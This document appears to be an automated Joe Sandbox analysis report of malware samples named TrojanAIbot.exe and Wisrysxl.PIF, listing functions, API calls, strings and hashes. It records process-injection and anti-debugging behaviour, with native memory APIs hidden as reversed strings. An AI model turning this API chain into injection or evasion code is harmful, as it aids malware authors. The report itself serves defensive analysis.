Opcode ID: b77cac8307122c855f8995cd30c73d7e5e98d78c32e259b7be39cb6a99c89ffb
Instruction ID: e5e36c3ddcdda28ccd7b7755b7ba319ef2bf57d8d0ffdef6bac679a327daa475
Opcode Fuzzy Hash: b77cac8307122c855f8995cd30c73d7e5e98d78c32e259b7be39cb6a99c89ffb
Instruction Fuzzy Hash: 011126B1900349AFDB10CFAAD844ADEBFF8FB48310F14841AE514A7210C375A954DFA5

Function 065BD528 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 065BD592

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: ccd84bb7e6d1732d5866945c4c359c8bc0ac5554bdef15549ef3685678879341
Instruction ID: 2e33a9c4e3ec0887e7f7ad69936dc5fcc9606f62e01dcea0da0953cd0d084559
Opcode Fuzzy Hash: ccd84bb7e6d1732d5866945c4c359c8bc0ac5554bdef15549ef3685678879341
Instruction Fuzzy Hash: EB11D0B6C002498FDB14CF9AC844ADEBBF4EF88324F14842AD859A7250D378A645CFA5

Function 065BFC68 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 065BFCCD

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd09b292cb56768c97f1703a6dc7deb5eb792ec4f1e975156d296741ca6a71f9
Instruction ID: 975a61cc7feb22b0bf24ad3989f606c79760345c699929deb36d97146730e904
Opcode Fuzzy Hash: bd09b292cb56768c97f1703a6dc7deb5eb792ec4f1e975156d296741ca6a71f9
Instruction Fuzzy Hash: 5D1106B5D002499FDB10DF99D985BDEBBF8FB48320F10841AD918A7640C375A594CFA6

Function 02F7D618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F7D67E

Memory Dump Source

Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0a9cd5ecfc5c7960fdf7025805a828274245a01068a4139cbacbbeee3bff2cc8
Instruction ID: f503d239e25cdde2a84a1144d5293430a1d44b9943ef523bf2d5d79bb5355ff5
Opcode Fuzzy Hash: 0a9cd5ecfc5c7960fdf7025805a828274245a01068a4139cbacbbeee3bff2cc8
Instruction Fuzzy Hash: DC11DFB5C002498FDB10DF9AD844A9EFBF4EF88214F11846AD519A7210D379A545CFA5

Function 065BE460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 065BFCCD

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 555538d50bf2abcb57e9695f2bfde163de28bb62373d30fdd6deda309b0657b1
Instruction ID: 5ce30e9544a5eadfb21282266ea7a563139bd4e7ade51f505a7cb90b22344b8e
Opcode Fuzzy Hash: 555538d50bf2abcb57e9695f2bfde163de28bb62373d30fdd6deda309b0657b1
Instruction Fuzzy Hash: C31106B5804349DFDB50DF99D948BDEBBF8FB48310F108459E918A7200D375A994CFA5

Function 065B40B1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065B4115

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 4d4cc734c89aa41ffb148cd0750638da82ce349b37bc75bc14f4dcc563776485
Instruction ID: cf4792a29f1df311a73ee9dee41183b908d5d0f3ce1f26ac517af3a2986ff775
Opcode Fuzzy Hash: 4d4cc734c89aa41ffb148cd0750638da82ce349b37bc75bc14f4dcc563776485
Instruction Fuzzy Hash: 441133B5C002099FDB10CF89C985BDEBBF8FB48320F24841AE918A3300C378A944CFA1

Function 065B1B7C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065B4115

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 7bee932071dc0630141d0b36987ff286068a558c07d4e4ca64f52ae96f29a3c4
Instruction ID: 2eb4456db499e21737c1c7bff247175dee0e7692b9bfcf5fc75f1a76ad7d0946
Opcode Fuzzy Hash: 7bee932071dc0630141d0b36987ff286068a558c07d4e4ca64f52ae96f29a3c4
Instruction Fuzzy Hash: 191106B5C002499FDB20DF99D485BDEBBF8FB58310F108459D919A7301D374A954CFA6

Function 0663225C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06633687), ref: 06634125

Memory Dump Source

Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 6012eb501b0b6e8153ae010b5c936de690168706091e131637082c7fc817c438
Instruction ID: 6450c9220fb5c0fa948821e69d4fd66a06f0d748a6ba4280aa99a60efd9d0b7a
Opcode Fuzzy Hash: 6012eb501b0b6e8153ae010b5c936de690168706091e131637082c7fc817c438
Instruction Fuzzy Hash: 2C11FEB5C046598FCB20DF9AD848BDEFBF4EB48310F10846AE419A7200D378A954CFA6

Function 06633140 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0663319D

Memory Dump Source

Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 06e9003456bb1033befa8d818d58d9510c381012d2ee9611c0cf0d7c02a5ccbc
Instruction ID: 39ad50032bb927205abe27ebb8e8e2d8893c3ddc15da42e46df979c6b40479ee
Opcode Fuzzy Hash: 06e9003456bb1033befa8d818d58d9510c381012d2ee9611c0cf0d7c02a5ccbc
Instruction Fuzzy Hash: A21130B5C002498FCB10CF99D949BDEBBF4EB08220F20841AD419A7740D378AA48CFA2

Function 066321B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0663319D

Memory Dump Source

Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 335f3b4d584c6c0afc7e5fe64a432c33ddcf08f204f486e21b6136f6690f4548
Instruction ID: 3335146461f6bf38986cc85108b4f6c924be72fe4124851660832420a575265a
Opcode Fuzzy Hash: 335f3b4d584c6c0afc7e5fe64a432c33ddcf08f204f486e21b6136f6690f4548
Instruction Fuzzy Hash: 291112B5D003498FDB60DF9AD448B9EBBF8EB48321F208459D519B7300D375A944CFA6

Function 066340C1 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06633687), ref: 06634125

Memory Dump Source

Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: e17cc20772c6fd0e33d0d0ff65fdae337b11f848a36d210dcfeffacc37251c65
Instruction ID: e413cde17367e5e25d0f9091127513d068054cce44f16d4e71337c650018b05b
Opcode Fuzzy Hash: e17cc20772c6fd0e33d0d0ff65fdae337b11f848a36d210dcfeffacc37251c65
Instruction Fuzzy Hash: 6D1100B5D006598FCB10CF9AD944BDEFBF4EB48320F10842AD418B3640D378A544CFA6

Function 0158D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4527761809.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_158d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba6ffbcd2b19059771ce8b55f2023f17b4dd9d7cccc902dd6e1f0262f90df1d
Instruction ID: 4286980d412684a91c9d86f7c0771413d265521dbb843c18082f59034120ba25
Opcode Fuzzy Hash: 9ba6ffbcd2b19059771ce8b55f2023f17b4dd9d7cccc902dd6e1f0262f90df1d
Instruction Fuzzy Hash: 052100B1604204EFDB15EF98D980B2ABBF5FB84314F24C96DD84A5F286D33AD407CA61

Function 0158D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4527761809.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_158d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8d6c901c04bb6f258cb412e08f61f2d1a1ed6b74c6158153b0dcbf6c2fd4ff
Instruction ID: 0d20d40cbc80aa2d85b6753b630898e92041097dbd92a8f43488fde788b9e8b9
Opcode Fuzzy Hash: 4f8d6c901c04bb6f258cb412e08f61f2d1a1ed6b74c6158153b0dcbf6c2fd4ff
Instruction Fuzzy Hash: 36216D75509380CFDB02DF64D594715BFB1FB46214F28C5DAD8498F6A7C33A980ACB62

Function 0157D07D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4527460271.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_157d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48cbc4c77e5765ff797b3fdeee8f9c9c4b245492fec13e15296bb12b6d679a8e
Instruction ID: 3a5150c335c5c0d9d07cfe652223ac1a6796ae8ac6c180b44058e669516dfb66
Opcode Fuzzy Hash: 48cbc4c77e5765ff797b3fdeee8f9c9c4b245492fec13e15296bb12b6d679a8e
Instruction Fuzzy Hash: 9F01A7710053449AE7125AA9EC85767BFF8FF413A0F18D85AED090F286E2799845CA71

Function 0157D07C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4527460271.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_157d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd54e826408386121acf84bce1f788bdbcac3446af37ed8c81b3aab2ba65e15c
Instruction ID: ca4e02b5614ed4dae57ff03d56dd3334473f0981baba9cbd15a2f6108285717c
Opcode Fuzzy Hash: fd54e826408386121acf84bce1f788bdbcac3446af37ed8c81b3aab2ba65e15c
Instruction Fuzzy Hash: 06F0CD71404340AEE7118A1AEC84B67FFA8FF412B4F18C45AED080F286D3B99845CAB1

Analysis Process: TrojanAIbot.exePID: 6208, Parent PID: 1068COMMON

Executed Functions

Function 00FC0839 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f45b0fd48a799c717c53218161ea32a5b296675d72f50616f2624b2acb6ef9
Instruction ID: 56c364c3921dbe905f7753dfee5e5e2af56b3375062d903f1bef72e378e4512e
Opcode Fuzzy Hash: f9f45b0fd48a799c717c53218161ea32a5b296675d72f50616f2624b2acb6ef9
Instruction Fuzzy Hash: B362BF70A01219CFCB65EF64D894B9DBBB2FF88700F1085A9D44AAB364DB315E86CF41

Function 00FC0848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d89052c727803a5e0111e6b9e774e719e1104221cd10e1c487183c9ff06b888
Instruction ID: 58063c00b8dc1eb627964cd8ac25b507674a14d1405279449e3954c2dd83f739
Opcode Fuzzy Hash: 6d89052c727803a5e0111e6b9e774e719e1104221cd10e1c487183c9ff06b888
Instruction Fuzzy Hash: E662AF74A01219CFDB64EF64D894B9DBBB2FF88700F1085A9D44AAB364DB315E86CF41

Function 00FC5228 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb16a39d8ea6689c25b36cd3a5d64e97527146d4809cd54f6ecf2d5d11d96d7
Instruction ID: 274dbddcb6ae43eb6ed64423cfb21b780158b0d51780fd9d17b36f2d8a7db77d
Opcode Fuzzy Hash: adb16a39d8ea6689c25b36cd3a5d64e97527146d4809cd54f6ecf2d5d11d96d7
Instruction Fuzzy Hash: 79117C70D4925A9FCB00AFB4C91C7AD7FF0EB06301F0458AEC455A72E2C7784649EB51

Function 00FC5238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2254173221.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_fc0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f6f68e0b1aae7800274721440c696bef78fe844cf3202d14daf52e5037d71ec
Instruction ID: 09e4db8b0654021bbdf232cbfc8a089c7ea00032521cc2c4d10045a2d7ec56c6
Opcode Fuzzy Hash: 2f6f68e0b1aae7800274721440c696bef78fe844cf3202d14daf52e5037d71ec
Instruction Fuzzy Hash: 07015AB0C0021ADFCB04EFB5C51DBAEBBF0EB05312F0098A9C415A3290DB780688EF91

Analysis Process: Wisrysxl.PIFPID: 2944, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1301
Total number of Limit Nodes:	21

Executed Functions

Function 02DB7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DB7A9F

Strings

ntdll, xrefs: 02DB7A74
yromeMlautriVetacollAwZ, xrefs: 02DB7A47

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: c20ecd23bec3a5cbf5e2e74faf29d1aa2434e5f7bdca76fbfc3e74b0ad1486b1
Instruction ID: 5cbff0670738b111d895c4548ff6a9b9c49fad9d09de46474c0107e353190f96
Opcode Fuzzy Hash: c20ecd23bec3a5cbf5e2e74faf29d1aa2434e5f7bdca76fbfc3e74b0ad1486b1
Instruction Fuzzy Hash: 0A113C75644208FFEB01EFA4EC61EDAB7ADEB49700F414460B906D7340DA70AE548B70

Function 02DB7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DB7A9F

Strings

ntdll, xrefs: 02DB7A74
yromeMlautriVetacollAwZ, xrefs: 02DB7A47

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 385a43df041cf633e03e5b88b786b6a81c0572e794d979741cdeb3d2cd6288ed
Instruction ID: 7a31544ec10ed767d4684e261f53dab55018a6988776d5cf6047202f60eb2321
Opcode Fuzzy Hash: 385a43df041cf633e03e5b88b786b6a81c0572e794d979741cdeb3d2cd6288ed
Instruction Fuzzy Hash: 8B113975684208EFEB01EFA4EC61EDAB7ADEB89700F814460B906D7340DA70AE548B70

Function 02DB8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DB8471

Strings

ntdll, xrefs: 02DB8448
yromeMlautriVdaeRtN, xrefs: 02DB841B

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2004920654-737317276
Opcode ID: e6ab7371d06da01ace5836354d5627694523162e3d53c284c0bedc1951878c3c
Instruction ID: 5d47ac4978f7236fe5d33a1d813a28e2cb1def8fce0aa8ef7de4a6229c014f49
Opcode Fuzzy Hash: e6ab7371d06da01ace5836354d5627694523162e3d53c284c0bedc1951878c3c
Instruction Fuzzy Hash: 35016D75640208EFEB11EFA4EC61E9AB7EEEB48700F514420F906D7340DA74AD149B34

Function 02DB7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DB7DEC

Strings

yromeMlautriVetirW, xrefs: 02DB7D93
Ntdll, xrefs: 02DB7DC3

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 4260932595-3542721025
Opcode ID: e8e7bdd57bd4dad1be1a4827c88cced657a4016d8ce634814862a67d6ddede14
Instruction ID: 67a9fac94f87bdb503b03f10ed59c25bb3c553d32b3a4b83b95e1cb0195a76a1
Opcode Fuzzy Hash: e8e7bdd57bd4dad1be1a4827c88cced657a4016d8ce634814862a67d6ddede14
Instruction Fuzzy Hash: 16012D7A640205EFEB11EF98EC62E9EB7EDEF89B00F514850B802D7740D670AD548B74

Function 02DB7AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DB7A9F

Strings

ntdll, xrefs: 02DB7A74
yromeMlautriVetacollAwZ, xrefs: 02DB7A47

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 2167126740-445027087
Opcode ID: f7f0012841a4b920ae9ebc2c61677591b2b71b2270f9583bdca1b5fe85d6db9b
Instruction ID: 33c3e42675878a10e9f2ea37c2cceeea758f47f5e368136d06b8d0deb26fb11c
Opcode Fuzzy Hash: f7f0012841a4b920ae9ebc2c61677591b2b71b2270f9583bdca1b5fe85d6db9b
Instruction Fuzzy Hash: 1C011B76944204EFEB05DF94D961DDEB7ADEF89710F414860B806C7700DA349E54CF64

Function 02DB8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02DB86D5

Strings

noitceSfOweiVpamnUtN, xrefs: 02DB868B
ntdll, xrefs: 02DB86B8

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 2801472262-2520021413
Opcode ID: 15d6bae871c82f4a4ab149fbd04a6b20abbe9cbe3879bdc8d635ec114d73b159
Instruction ID: 47a4abc5be7922061c250086df21d56e3f6c3a261110abbe25209ec6b1f47479
Opcode Fuzzy Hash: 15d6bae871c82f4a4ab149fbd04a6b20abbe9cbe3879bdc8d635ec114d73b159
Instruction Fuzzy Hash: CB014F34A80244EFEB11EFA5ED61E9AB7AEEF49710F914860A402D7740DA74AD449A34

Function 02DB86F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 02DB86D5

Strings

noitceSfOweiVpamnUtN, xrefs: 02DB868B
ntdll, xrefs: 02DB86B8

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 498011366-2520021413
Opcode ID: 431934125932af58677777e3cd48f322a1672b9246131dad53539bf62662bcaa
Instruction ID: de3fc0af4f35e345a1e4b6c19981752c43c26218c67ec4748efbe9e187d8decd
Opcode Fuzzy Hash: 431934125932af58677777e3cd48f322a1672b9246131dad53539bf62662bcaa
Instruction Fuzzy Hash: 87F0D135941144EFDB01EFB0E9619DDB3EEEF84710F4144A1A806C7700DA74AE09DA20

Function 02DB8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DB8814

Strings

Kernel32, xrefs: 02DB87D3
CreateProcessAsUserW, xrefs: 02DB87A1

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressCreateHandleModuleProcProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 4105707577-2353454454
Opcode ID: 0f966190b4ee1d14202c8d6aa43aa73f04ed50a4226d92c8596adbf36d6ab842
Instruction ID: 2c59ab62f2192168cd99b84e7b056fb22bf29111432b55490fe3bb569f86bcf1
Opcode Fuzzy Hash: 0f966190b4ee1d14202c8d6aa43aa73f04ed50a4226d92c8596adbf36d6ab842
Instruction Fuzzy Hash: C211C2B6680248EFEB41EEA9ED61F9A77EDEB0C700F914420BA09D7300C674ED549B24

Function 02DBF744 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DBF77D

Strings

CheckRemoteDebuggerPresent, xrefs: 02DBF760
KernelBase, xrefs: 02DBF74F

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 3662101638-539270669
Opcode ID: b794fafc223ae5d7f22b69177c015076fb431a862cab1c02f87700fea03f30c1
Instruction ID: 3828c01171618d43b52ec45b866fc116cb9daa57252e12205680589fb3c70bd0
Opcode Fuzzy Hash: b794fafc223ae5d7f22b69177c015076fb431a862cab1c02f87700fea03f30c1
Instruction Fuzzy Hash: 82F0A771904248FEEB11A7B98C987DCFBA99F05329F2847D0B43662AD1E7714A44CAA1

Non-executed Functions

Function 02DB8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E

Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DB83C2), ref: 02DB83A4

Strings

FlushInstructionCache, xrefs: 02DB8351
Kernel32, xrefs: 02DB8383

Memory Dump Source

Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd

Similarity

API ID: AddressCacheFlushHandleInstructionModuleProc
String ID: FlushInstructionCache$Kernel32
API String ID: 2392256011-184458249
Opcode ID: 61d9d237c5a343639e1843c341fe7bf784b9dd8cc21e6a8d9ba92ba23409a28d
Instruction ID: ed6f074f0882da2de059c638e9eab72202e5cf50b9ef7349e3da205d2f125618
Opcode Fuzzy Hash: 61d9d237c5a343639e1843c341fe7bf784b9dd8cc21e6a8d9ba92ba23409a28d
Instruction Fuzzy Hash: 8C014F71684344EFE711EFA5EC71F9A77ADEB08B00F914460B902D6740DAB4AD549A34

Function 02DB8274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 02DB82D9

Strings

Kernel32, xrefs: 02DB82BC
